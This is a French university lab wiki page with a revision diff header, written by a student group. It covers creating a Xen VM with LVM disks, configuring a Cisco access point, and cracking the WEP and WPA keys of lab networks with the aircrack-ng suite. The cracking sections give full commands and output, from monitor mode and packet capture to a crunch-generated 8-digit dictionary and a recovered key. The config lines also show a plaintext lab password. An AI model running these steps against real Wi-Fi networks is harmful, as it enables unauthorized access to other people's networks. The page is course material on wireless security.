TP sysres IMA2a5 2021/2022 G12 : Différence entre versions

De Wiki d'activités IMA
Ligne 120 : Ligne 120 :
 
== Craquage de clés : ==
 
== Craquage de clés : ==
 
   
 
   
'''Craquage clé WEP:'''  
+
===='''Craquage clé WEP:''' ====
  
 
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
 
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
Ligne 188 : Ligne 188 :
 
Decrypted correctly: 100%
 
Decrypted correctly: 100%
  
'''Craquage clé WPA :'''
+
===='''Craquage clé WPA :'''====
  
 
On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :
 
On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :

Version du 29 novembre 2021 à 12:36

Création machine virtuelle

Dans un premier temps, on dois créer une machine virtuelle sur le serveur distant. On s'y connecte donc en tant que superuser :

 ssh -4 root@capbreton.plil.info

On créer alors la machine grâce à la commande qui suit :

 xen-create-image --force --hostname=Battlefield --ip=193.48.57.172 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster

La machine est alors créée sur capbreton. On passe à la configuration des disques, pour créer un RAID5 :

 lvcreate -L1G -n Battlefield1 virtual 
 lvcreate -L1G -n Battlefield2 virtual 
 lvcreate -L1G -n Battlefield3 virtual 
 lvcreate -L1G -n Battlefield4 virtual

On augmente ensuite la taille des 4 disques :

 lvextend -L +9G /dev/virtual/Battlefield1
 lvextend -L +9G /dev/virtual/Battlefield2
 lvextend -L +9G /dev/virtual/Battlefield3
 lvextend -L +9G /dev/virtual/Battlefield4


On vérifie que les disques sont bien installés :

 lvdisplay 

Détail d'un disque installé :

 --- Logical volume ---
 LV Path                /dev/virtual/Battlefield1
 LV Name                Battlefield1
 VG Name                virtual
 LV UUID                gvf9pC-5DAB-1YGt-fYJ1-ecrM-nZG2-ZFCf41
 LV Write Access        read/write
 LV Creation host, time capbreton, 2021-09-24 08:40:48 +0200
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               2
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:57

Puis on formate les disques :

mke2fs /dev/virtual/Battlefield1
mke2fs /dev/virtual/Battlefield2
mke2fs /dev/virtual/Battlefield3
mke2fs /dev/virtual/Battlefield4

Configuration du point d'accès wifi

Réinitialisation des paramètres de la borne wifi :

erase startup config reload

Configuration de base :

ap>enable ap#configure terminal

Configuration du nom d'hôte :

ap(config)#hostname SE2A5-AP1

Accès ssh :

SE2A5-AP1(config)#aaa new-model SE2A5-AP1(config)#username admin privilege 15 secret glopglop SE2A5-AP1(config)#ip domain-name plil.info SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048 SE2A5-AP1(config)#ip ssh version 2 SE2A5-AP1(config)#line vty 0 15 SE2A5-AP1(config-line)#transport input ssh SE2A5-AP1(config-line)#exit

Sécurisation des accès :

SE2A5-AP1(config)#service password-encryption SE2A5-AP1(config)#enable secret glopglop SE2A5-AP1(config)#banner motd #Restricted Access#

VLAN 172

aaa authentication login EAP_TOAD group RADIUS_BATTLEFIELD radius-server host 193.48.57.172 auth-port 1812 acct-port 1813 key glopglop aaa group server radius RADIUS_BATTLEFIELD server 193.48.57.172 auth-port 1812 acct-port 1813 exit dot11 ssid BATTLEFIELD1 mbssid guest-mode vlan 172 authentication open eap EAP_BATTLEFIELD authentication network-eap EAP_BATTLEFIELD authentication key-management wpa exit interface dot11radio0.172 encapsulation dot1q 172 bridge-group 72 exit interface g0.172 encapsulation dot1q 172 bridge-group 72 exit interface dot11radio 0 no shutdown encryption vlan 172 mode ciphers aes-ccm tkip mbssid ssid BATTLEFIELD1 exit


Craquage de clés :

Craquage clé WEP:

Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".

Tout d'abord, on installe l'utilitaire aircrack-ng

 su -
 apt install aircrack-ng

On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur :

 lsusb
Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard
Bus 001 Device 007: ID 413c:301a Dell Computer Corp. 
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clé wifi est bien reconnue par le PC : Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

On récupère le nom de l'interface de la clé Wifi :

airmon-ng 


On renomme l'interface en wlan0mon, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :

 airmon-ng start wlx40a5ef059e47

On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:

 airodump-ng wlan0mon

On obtient alors les informations suivantes :

BSSID                 PWR     Beacons    #Data,   #/s      CH      MB      ENC     CIPHER   AUTH ESSID
04:DA:D2:9C:50:50     -40           2      3       4        3      54e      WEP     WEP         cracotte01

On récupère dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte01 :

airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:50 wlan0mon

On attends qu'il y ai au moins 30 000 trames récupérées puis on lance le crackage de la clé :

 aircrack-ng lcrack-01.cap

Après 5-10min, on obtient le code de la clé Wifi :

                                   Aircrack-ng 1.5.2 


                      [00:00:00] Tested 721 keys (got 665952 IVs)

  KB    depth   byte(vote)
   0    1/  2   27(703488) 1D(696832) 92(694528) EB(692224) A6(689408) 9D(688896) 
   1    2/  1   D0(698112) 65(697344) A7(696320) 0D(695296) 21(693504) 3A(692224) 
   2    1/  3   9B(701440) FC(697344) 2E(695808) 6D(692224) 57(689152) CF(688640) 
   3    1/  5   BB(703232) 30(700416) A6(699392) AB(699136) C2(696064) 36(695296) 
   4   13/  4   35(687104) D6(686592) 76(686080) 23(685824) 48(685824) 63(685568) 

            KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ] 

Decrypted correctly: 100%

Craquage clé WPA :

On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :

apt-get install aircrack-ng

Listing de toutes les interfaces Wi-Fi

airmon-ng

On obtient la liste ci-dessous :

PHY	Interface	  Driver	  Chipset
phy0	wlx40a5ef059e47	  rt2800usb       Ralink Technology, Corp. RT5370 

On passe la carte Wifi en mode monitor :

airmon-ng start wlx40a5ef059e47	

On observe les trames de réseaux avec la commande :

airodump-ng wlan0mon

On récupère le BSSID de krakotte01 et le channel : 44:AD:D9:5F:87:00 sur le channel 8 On enregistre alors les trames qui passent sur krakotte01 dans un fichier krakotte.txt :

airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w krakotte.txt wlan0mon

On attend environ 1/4 d'heure pour récupérer suffisamment de trames.

Exécution de Aircrack :

On créé alors un dictionnare contenant l'ensemble des mots de passes potentiels. On sait que la clé WPA est composée de 8 chiffres aléatoires, donc le dictionnaire contient 100 000 000 possibilités et est créé grâce à la commande suivante :

crunch 8 8 0123456789 >> dico.txt

Pour accélerer le processus de crackage, on divise le dictionnaire en 5 fichiers :

split -b 200m dico.txt

On peut vérifier que cela a bien fonctionné en regardant le contenu des fichiers générés

ls
>> xaa
>> xab
>> xac
>> xad
>> xae

Posséder ces différents fichiers va me permettre d'exécuter la commande aircrack-ng sur d'autres zabeth de manière à diminuer le temps de recherche du mot de passe.

Cassage de la clef WPA :

aircrack-ng -w xaa krakotte01.cap
aircrack-ng -w xab krakotte01.cap
aircrack-ng -w xac krakotte01.cap
aircrack-ng -w xad krakotte01.cap
aircrack-ng -w xae krakotte01.cap